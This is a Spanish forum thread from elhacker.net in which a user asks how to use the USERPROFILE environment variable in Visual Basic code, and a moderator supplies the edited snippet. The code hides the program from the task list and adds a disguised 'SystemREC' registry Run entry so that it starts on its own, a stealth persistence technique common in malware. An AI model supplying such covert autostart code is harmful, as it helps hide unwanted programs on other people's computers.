elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Variables de entorno
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Variables de entorno  (Leído 2,313 veces)
.;.


Desconectado Desconectado

Mensajes: 354


Ver Perfil
Variables de entorno
« en: 10 Abril 2009, 20:30 pm »

Hola, bueno pues he leido lo de las variables de entorno y Environ, pero no se como aplicarlo a este code.

Código
  1. Private Sub Form_Load()
  2. Dim r As String
  3. App.TaskVisible = False
  4. CLAVE = "SystemREC"
  5. VALOR = "C:\WINDOWS\systemrec.exe"
  6. Set wsc = CreateObject("wscript.shell")
  7. r = wsc.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SystemREC")
  8. If r <> VALOR Then
  9.     wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & CLAVE, VALOR
  10. End If
  11. End Sub

¿Alguien sabe?

Quiero cambiar Windows por la variable USERPROFILE


En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: Variables de entorno
« Respuesta #1 en: 10 Abril 2009, 20:40 pm »

Hola, asi ?

Código
  1. Private Sub Form_Load()
  2.    Dim r As String
  3.    App.TaskVisible = False
  4.    CLAVE = "SystemREC"
  5.    VALOR = Environ("USERPROFILE") & "\systemrec.exe"
  6.    Set wsc = CreateObject("wscript.shell")
  7.    r = wsc.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SystemREC")
  8.    If r <> VALOR Then
  9.         wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & CLAVE, VALOR
  10.    End If
  11. End Sub
  12.  

saludos.


En línea

.;.


Desconectado Desconectado

Mensajes: 354


Ver Perfil
Re: Variables de entorno
« Respuesta #2 en: 10 Abril 2009, 20:50 pm »

Si, gracias seba.

;D
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Variables De Entorno !!! Ayuda
Windows
Puma93 2 3,139 Último mensaje 26 Agosto 2011, 17:20 pm
por Puma93
Variables de Entorno vb 2008
Programación Visual Basic
Odunacam 0 1,809 Último mensaje 5 Octubre 2011, 22:22 pm
por Odunacam
Cambiar variables de entorno en Linux
Programación C/C++
0xDani 4 3,417 Último mensaje 22 Octubre 2012, 16:25 pm
por 0xDani
[SHELL Linux] Cómo definir muchas variables de entorno en base a un archivo?
Scripting
Skeletron 2 2,420 Último mensaje 14 Enero 2014, 22:02 pm
por Eleкtro
Pasar variables de entorno a variables del sistema
Scripting
Scry 0 1,847 Último mensaje 16 Mayo 2017, 11:09 am
por Scry
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines